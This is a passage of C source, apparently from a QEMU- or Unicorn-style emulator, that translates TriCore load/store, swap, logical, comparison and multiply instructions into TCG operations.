gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_DA_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_H_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LESW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_H_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LESW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_HU_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_HU_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_Q_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_Q_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_W_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_W_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } static void decode_bo_addrmode_stctx_post_pre_base(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int r1, r2; TCGv temp, temp2; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = 
MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_BO_LDLCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_ldlcx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_LDMST_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_ldmst(ctx, r1, temp); break; case OPC2_32_BO_LDMST_POSTINC: gen_ldmst(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LDMST_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_ldmst(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_BO_LDUCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_lducx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_LEA_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_STLCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_stlcx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_STUCX_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_helper_stucx(tcg_ctx, tcg_ctx->cpu_env, temp); break; case OPC2_32_BO_SWAP_W_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_swap(ctx, r1, temp); break; case OPC2_32_BO_SWAP_W_POSTINC: gen_swap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_SWAP_W_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_swap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_BO_CMPSWAP_W_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_cmpswap(ctx, r1, temp); break; case OPC2_32_BO_CMPSWAP_W_POSTINC: gen_cmpswap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_CMPSWAP_W_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_cmpswap(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_BO_SWAPMSK_W_SHORTOFF: tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_swapmsk(ctx, r1, temp); break; case OPC2_32_BO_SWAPMSK_W_POSTINC: gen_swapmsk(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_SWAPMSK_W_PREINC: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); gen_swapmsk(ctx, r1, tcg_ctx->cpu_gpr_a[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void decode_bo_addrmode_ldmst_bitreverse_circular(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int r1, r2; TCGv temp, temp2, temp3; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_const_i32(tcg_ctx, off10); CHECK_REG_PAIR(r2); tcg_gen_ext16u_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2+1]); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); switch (op2) { case OPC2_32_BO_LDMST_BR: gen_ldmst(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], 
tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LDMST_CIRC: gen_ldmst(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_SWAP_W_BR: gen_swap(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_SWAP_W_CIRC: gen_swap(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_CMPSWAP_W_BR: gen_cmpswap(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_CMPSWAP_W_CIRC: gen_cmpswap(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_SWAPMSK_W_BR: gen_swapmsk(ctx, r1, temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_SWAPMSK_W_CIRC: gen_swapmsk(ctx, r1, temp2); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } static void decode_bol_opc(DisasContext *ctx, int32_t op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; int32_t address; TCGv temp; r1 = MASK_OP_BOL_S1D(ctx->opcode); r2 = MASK_OP_BOL_S2(ctx->opcode); address = MASK_OP_BOL_OFF16_SEXT(ctx->opcode); switch (op1) { case OPC1_32_BOL_LD_A_LONGOFF: temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], address); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp, ctx->mem_idx, MO_LEUL); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_BOL_LD_W_LONGOFF: temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], address); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUL); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_BOL_LEA_LONGOFF: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], address); break; case OPC1_32_BOL_ST_A_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LEUL); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_ST_W_LONGOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LEUL); break; case OPC1_32_BOL_LD_B_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_SB); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_LD_BU_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_UB); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_LD_H_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LESW); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_LD_HU_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LEUW); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_ST_B_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_SB); } else 
{ generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_32_BOL_ST_H_LONGOFF: if (has_feature(ctx, TRICORE_FEATURE_16)) { gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], address, MO_LESW); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RC format */ static void decode_rc_logical_shift(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int32_t const9; TCGv temp; r2 = MASK_OP_RC_D(ctx->opcode); r1 = MASK_OP_RC_S1(ctx->opcode); const9 = MASK_OP_RC_CONST9(ctx->opcode); op2 = MASK_OP_RC_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RC_AND: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ANDN: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], ~const9); break; case OPC2_32_RC_NAND: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_nand_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_NOR: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_nor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_OR: tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ORN: tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], ~const9); break; case OPC2_32_RC_SH: const9 = sextract32(const9, 0, 6); gen_shi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_H: const9 = sextract32(const9, 0, 5); gen_sh_hi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SHA: const9 = sextract32(const9, 0, 6); gen_shaci(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SHA_H: const9 = sextract32(const9, 0, 5); gen_sha_hi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SHAS: gen_shasi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_XNOR: tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RC_XOR: tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_rc_accumulator(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int16_t const9; TCGv temp; r2 = MASK_OP_RC_D(ctx->opcode); r1 = MASK_OP_RC_S1(ctx->opcode); const9 = MASK_OP_RC_CONST9_SEXT(ctx->opcode); op2 = MASK_OP_RC_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RC_ABSDIF: gen_absdifi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ABSDIFS: gen_absdifsi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADD: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDC: gen_addci_CC(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDS: gen_addsi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDS_U: gen_addsui(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_ADDX: gen_addi_CC(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_AND_EQ: 
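        /*
         * The AND_/OR_/XOR_ compare variants accumulate rather than
         * overwrite: the 1-bit comparison result is combined into D[c][0]
         * through the callback, leaving bits 31..1 of D[c] untouched.
         * For AND.EQ that is, as a sketch,
         *     D[c][0] = D[c][0] & (D[a] == sign_ext(const9));
         * Note the unsigned forms (GE.U, LT.U, ...) first re-read const9
         * zero-extended via MASK_OP_RC_CONST9.
         */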
gen_accumulating_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_GE: gen_accumulating_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_LT: gen_accumulating_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_AND_NE: gen_accumulating_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_and_tl); break; case OPC2_32_RC_EQ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_EQANY_B: gen_eqany_bi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_EQANY_H: gen_eqany_hi(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_GE: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_LT: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MAX: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_MAX_U: tcg_gen_movi_tl(tcg_ctx, temp, MASK_OP_RC_CONST9(ctx->opcode)); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_MIN: tcg_gen_movi_tl(tcg_ctx, temp, const9); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_MIN_U: tcg_gen_movi_tl(tcg_ctx, temp, MASK_OP_RC_CONST9(ctx->opcode)); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_RC_NE: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_OR_EQ: gen_accumulating_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_GE: gen_accumulating_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_LT: gen_accumulating_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, 
TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_OR_NE: gen_accumulating_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_or_tl); break; case OPC2_32_RC_RSUB: tcg_gen_movi_tl(tcg_ctx, temp, const9); gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r2], temp, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RC_RSUBS: tcg_gen_movi_tl(tcg_ctx, temp, const9); gen_subs(ctx, tcg_ctx->cpu_gpr_d[r2], temp, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RC_RSUBS_U: tcg_gen_movi_tl(tcg_ctx, temp, const9); gen_subsu(ctx, tcg_ctx->cpu_gpr_d[r2], temp, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RC_SH_EQ: gen_sh_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_GE: gen_sh_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_sh_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_LT: gen_sh_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_sh_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_SH_NE: gen_sh_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_XOR_EQ: gen_accumulating_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_GE: gen_accumulating_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_GE_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_LT: gen_accumulating_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_LT_U: const9 = MASK_OP_RC_CONST9(ctx->opcode); gen_accumulating_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; case OPC2_32_RC_XOR_NE: gen_accumulating_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9, &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_rc_serviceroutine(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t const9; op2 = MASK_OP_RC_OP2(ctx->opcode); const9 = MASK_OP_RC_CONST9(ctx->opcode); switch (op2) { case OPC2_32_RC_BISR: gen_helper_1arg(tcg_ctx, bisr, const9); break; case OPC2_32_RC_SYSCALL: /* TODO: Add exception generation */ break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rc_mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2; int16_t const9; r2 = MASK_OP_RC_D(ctx->opcode); r1 = MASK_OP_RC_S1(ctx->opcode); const9 = MASK_OP_RC_CONST9_SEXT(ctx->opcode); op2 = MASK_OP_RC_OP2(ctx->opcode); switch (op2) { case OPC2_32_RC_MUL_32: gen_muli_i32s(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MUL_64: CHECK_REG_PAIR(r2); gen_muli_i64s(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r2+1], tcg_ctx->cpu_gpr_d[r1], const9); break; case OPC2_32_RC_MULS_32: gen_mulsi_i32(ctx, 